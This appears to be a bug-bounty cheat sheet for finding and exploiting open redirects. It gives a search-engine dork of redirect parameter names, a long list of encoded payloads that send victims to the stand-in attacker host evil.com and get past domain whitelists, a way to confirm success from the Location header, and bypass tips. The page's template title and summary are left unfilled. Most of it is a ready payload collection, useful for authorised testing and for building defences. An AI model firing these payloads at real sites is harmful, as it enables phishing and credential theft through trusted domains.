Title here
Summary here
Open-Redirects
How to find entry points to test?
Caido HTTP history (look at URLs with parameters)
site:target.com inurl:(go= OR return= OR r_url= OR returnUrl= OR returnUri= OR locationUrl= OR goTo= OR return_url= OR next= OR continue= OR checkout_url= OR dest= OR destination= OR image_url= OR redirect= OR redir= OR return_path= OR return_to= OR rurl= OR target= OR view=)Functionalities usually associated with redirects:
- Login, Logout, Register & Password reset pages
- Change site language
- Links in emails
Read JavaScript code
Payload
Show the payload
/〱evil.com
〱evil.com
$2f%2fevil.com
$2f%2fevil.com%2f%2f
%01https://evil.com
/%09/evil.com
//%09/evil.com
///%09/evil.com
////%09/evil.com
/%09/[email protected]
//%09/[email protected]
///%09/[email protected]
////%09/[email protected]
%2f$2fevil.com
/%2f%2fevil.com
//%2f%2fevil.com
%2fevil.com
%2fevil.com//
%2fevil.com%2f%2f
/%5cevil.com
/%[email protected]
//%[email protected]
///%[email protected]
////%[email protected]
/cgi-bin/redirect.cgi?https://evil.com
?checkout_url=https://evil.com
?continue=https://evil.com
?dest=https://evil.com
?destination=https://evil.com
//evil%00.com
/\evil%252ecom
evil%252ecom
../evil.com
.evil.com
/.evil.com
/////evil.com
/////evil.com/
////\;@evil.com
////evil.com
////evil.com/
////evil.com//
///;@evil.com
///\;@evil.com
///evil.com
///evil.com/
///evil.com//
//;@evil.com
//\/evil.com/
//\evil.com
//evil.com
//evil.com/
//evil.com//
/<>//evil.com
/\/\/evil.com/
/\/evil.com
/\/evil.com/
/\evil.com
/evil.com
<>//evil.com
@evil.com
\/\/evil.com/
evil.com
evil.com%[email protected]
////evil.com/%2e%2e
///evil.com/%2e%2e
//evil.com/%2e%2e
/evil.com/%2e%2e
//evil.com/%2E%2E
////evil.com/%2e%2e%2f
///evil.com/%2e%2e%2f
//evil.com/%2e%2e%2f
////evil.com/%2f..
///evil.com/%2f..
//evil.com/%2f..
//evil.com/%2F..
/evil.com/%2F..
////evil.com/%2f%2e%2e
///evil.com/%2f%2e%2e
//evil.com/%2f%2e%2e
/evil.com/%2f%2e%2e
//evil.com//%2F%2E%2E
//evil.com:80#@whitelisted.com/
//evil.com:[email protected]/
evil.com/.jpg
//evil.com\twhitelisted.com/
//evil.com/whitelisted.com
//evil.com\@whitelisted.com
evil.com/whitelisted.com
//evil%E3%80%82com
?go=https://evil.com
http:%0a%0devil.com
/http://evil.com
/http:/evil.com
http://.evil.com
http://;@evil.com
http://evil.com
http:/\/\evil.com
http:/evil.com
http:evil.com
http://evil.com%23.whitelisted.com/
http://evil.com%2f%2f.whitelisted.com/
http://evil.com%3F.whitelisted.com/
http://evil.com%5c%5c.whitelisted.com/
http://evil.com:80#@whitelisted.com/
http://evil.com:[email protected]/
http://evil.com\twhitelisted.com/
/https://%09/evil.com
https://%09/evil.com
https://%09/[email protected]
https://%0a%0devil.com
/https:/%5cevil.com/
/https://%5cevil.com
https:/%5cevil.com/
https://%5cevil.com
/https://%[email protected]
https://%[email protected]
//https://evil.com//
/https://evil.com
/https://evil.com/
/https://evil.com//
/https:evil.com
https://////evil.com
https://evil.com
https://evil.com/
https://evil.com//
https:/\evil.com
https:evil.com
//https:///evil.com/%2e%2e
/https://evil.com/%2e%2e
https:///evil.com/%2e%2e
//https://evil.com/%2e%2e%2f
https://evil.com/%2e%2e%2f
/https://evil.com/%2f..
https://evil.com/%2f..
/https:///evil.com/%2f%2e%2e
/https://evil.com/%2f%2e%2e
https:///evil.com/%2f%2e%2e
https://evil.com/%2f%2e%2e
https://:@evil.com\@whitelisted.com
https://evil.com#whitelisted.com
https://evil.com/whitelisted.com
https://evil.com?whitelisted.com
https://evil.com\whitelisted.com
https://evil%E3%80%82com
//https://[email protected]//
/https://[email protected]/
https://whitelisted.com.evil.com
https://whitelisted.com;@evil.com
https://[email protected]
https://[email protected]/
https://[email protected]//
/https://[email protected]/%2e%2e
https:///[email protected]/%2e%2e
//https://[email protected]/%2e%2e%2f
https://[email protected]/%2e%2e%2f
/https://[email protected]/%2f..
https://[email protected]/%2f..
/https:///[email protected]/%2f%2e%2e
/https://[email protected]/%2f%2e%2e
https:///[email protected]/%2f%2e%2e
https://[email protected]/%2f%2e%2e
https://whitelisted.com/https://evil.com/
@https://www.evil.com
http://[email protected]/
?image_url=https://evil.com
/login?to=https://evil.com
?next=https://evil.com
/out/https://evil.com
/out?https://evil.com
/redirect/https://evil.com
?redirect=https://evil.com
?redirect_uri=https://evil.com
?redirect_url=https://evil.com
?redir=https://evil.com
?return=https://evil.com
?return_path=https://evil.com
?return_to=https://evil.com
?returnTo=https://evil.com
?rurl=https://evil.com
?target=https://evil.com
?url=https://evil.com
?view=https://evil.com
/\whitelisted.com:80%40evil.com
whitelisted.com@%E2%80%[email protected]
////[email protected]/
////[email protected]//
///[email protected]/
///[email protected]//
//[email protected]/
//[email protected]//
whitelisted.com.evil.com
whitelisted.com;@evil.com
////[email protected]/%2e%2e
///[email protected]/%2e%2e
////[email protected]/%2e%2e%2f
///[email protected]/%2e%2e%2f
//[email protected]/%2e%2e%2f
////[email protected]/%2f..
///[email protected]/%2f..
//[email protected]/%2f..In the payload, replace “whitelisted.com” by a whitelisted domain.
How to check for success?
The most reliable way to confirm a successful Open Redirect is to check the HTTP response headers from the server immediately after submitting the malicious payload.
A successful exploitation results in an HTTP status code indicating a redirection (usually 301, 302, 307, or 303) and the presence of a Location header pointing to your external, unauthorized domain (evil.com).
Caido HTTPQL Filter
To quickly filter your Caido history for potential successes, you can use the following HTTPQL query to look for something else than the supposed redirection domain.
resp.raw.ncont:"location: https:\/\/target.com"Tips
- Try using the same parameter twice:
?next=whitelisted.com&next=google.com - If extension checked, try ?image_url={payload}/.jpg
- Try
target.com/?redirect_url=.uk. If it redirects totarget.com.uk, then it’s vulnerable! target.com.uk and target.com are different domains.
